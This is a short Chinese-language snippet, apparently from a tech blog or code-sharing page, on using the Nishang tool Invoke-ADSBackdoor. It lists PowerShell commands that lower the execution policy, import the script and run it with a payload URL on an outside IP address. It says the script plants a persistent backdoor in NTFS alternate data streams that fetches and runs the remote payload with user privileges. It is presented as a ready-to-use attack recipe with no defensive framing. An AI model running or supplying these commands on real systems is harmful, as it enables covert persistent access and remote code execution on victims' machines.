Invoke-ADSBackdoor

代码语言：javascript复制

  nishang
  set-executionpolicy remotesigned
  Import-Module .Invoke-ADSBackdoor.ps1
  Invoke-ADSBackdoor -PayloadURL http://172.18.13.120:8080/1.ps1
  Invoke-ADSBackdoor脚本能在nfts数据流中留下一个永久性的后门
  Invoke-ADSBackdoor脚本用于向ADS注入代码并以普通用户权限运行
  
备用数据流（ADS）是微软的一项功能，其目的是提供与HFS（Mac的文件系统管理）的兼容性。

invoke

0 人点赞